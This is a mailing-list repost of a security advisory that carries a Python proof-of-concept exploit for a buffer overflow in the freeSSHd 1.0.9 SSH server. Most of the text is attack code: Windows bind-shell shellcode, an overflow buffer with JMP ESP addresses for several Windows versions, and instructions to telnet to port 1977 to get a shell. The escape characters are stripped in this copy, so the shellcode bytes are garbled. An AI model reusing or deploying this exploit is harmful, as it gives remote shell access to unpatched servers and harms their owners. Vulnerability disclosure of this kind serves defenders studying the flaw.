SecurityReason - POC exploit for freeSSHd version 1.0.9

Advisory Text :

Also available in Metasploit framework:

http://metasploit.com/projects/Framework/modules/exploits/freesshd_key_e
xchange.pm

david maciejak

> Hi all,
>
> Attachment is the POC exploit for freeSSHd version
> 1.0.9
>
> Advisories:
> http://www.securityfocus.com/bid/17958
> http://www.frsirt.com/english/advisories/2006/1786
>
> This was coded for the educational purpose.
>
> Regards,
>
> Tauqeer Ahmad
>
> __________________________________________________
> Do You Yahoo!?
> Tired of spam? Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com
>
> #!/usr/bin/env python
>
> """
> Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0
> ahmadtauqeer[at]yahoo.com
> Disclaimer: This Proof of concept exploit is for educational purpose
only.
> Please do not use it against any system without prior
permission.
> You are responsible for yourself for what you do with this
code.
>
> Greetings: All the Pakistani White Hats including me ;)
> Flames: To all the skript kiddies out there. Man grow up!.
> Code tasted against freeSSHd version 1.0.9
> If you didn't get shell at first try, try few times and you will get
lucky
>
> Advisories:
> http://www.securityfocus.com/bid/17958
> http://www.frsirt.com/english/advisories/2006/1786
>
> """
> import socket
> import getopt
> import sys
>
> host = "192.168.0.2"
> port = 0
> eip =""
>
> #/* win32_bind - EXITFUNC=thread LPORT=1977 Size=317 Encoder=None
http://metasploit.com */
> shellcode = "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45" >
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49" >
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d" >
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66" >
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61" >
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40" >
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32" >
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6" >
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09" >
"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0" >
"x66x68x07xb9x66x53x89xe1x95x68xa4x1ax70xc7x57xff" >
"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53" >
"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff" >
"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64" >
"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89" >
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab" >
"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51" >
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53" >
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6" >
"x52xffxd0x68xefxcexe0x60x53xffxd6xffxd0"
>
>
> def exploit():
>
> buff = "x53x53x48x2dx31x2ex39x39x2dx4fx70x65x6ex53x53x48" >
"x5fx33x2ex34x0ax00x00x4fx04x05x14x00x00x00x00x00" >
"x00x00x00x00x00x00x00x00x00x00x00x00x00x07xde"
>
> buff = buff + "A" * 1055
> buff = buff + eip
> buff = buff + "yyyy"
> buff = buff + "x90" * 4
> buff = buff + shellcode
> buff = buff + "B" * 19021 + "rn"
>
> sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
> sock.connect((host, port))
> print "+ Recive reply from server: " + sock.recv(1000)
>
> sock.send(buff)
> print "+ SSHD exploited. Now telnet to port 1977 to get shell "
> print "+ if you didnt get shell in first try.Try again until you
success"
>
> sock.close()
> sock = None
>
>
> def usage():
> print "#############################################"
> print "# CODED BY TAUQEER AHMAD #"
> print "# Scientist #"
> print "#############################################"
> print "n"
> print "Usage: %s -h <hostip> -p <port> -o <OS>" % sys.argv[0]
> print "Following OS supportedn"
> print "1 Window XP SP1"
> print "2 Window XP SP2"
> print "3 Windows 2000 Advanced Server"
>
>
> if __name__ == '__main__':
>
> if len(sys.argv) < 7:
> usage()
> sys.exit()
>
> try:
> options = getopt.getopt(sys.argv[1:], 'h:p:o:')[0]
> except getopt.GetoptError, err:
> print err
> usage()
> sys.exit()
>
>
> for option, value in options:
> if option == '-h':
> host = value
> if option == '-p':
> port = int(value)
> if option == '-o':
> if value == '1':
> eip = "xFCx18xD7x77" # 77D718FC JMP ESP IN USER32.dll
(Windows Xp professional SP1)
> elif value == '2':
> eip = "x0AxAFxD8x77" # 77D8AF0A JMP ESP IN USER32.DLL
(Windows Xp professional SP2)
> elif value == '3':
> eip = "x4Dx3FxE3x77" # 77E33F4D JMP ESP IN USER32.DLL
(windows 2000 advanced server)
> else:
> usage()
> sys.exit()
>
> exploit()
>
>
>
>
>
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>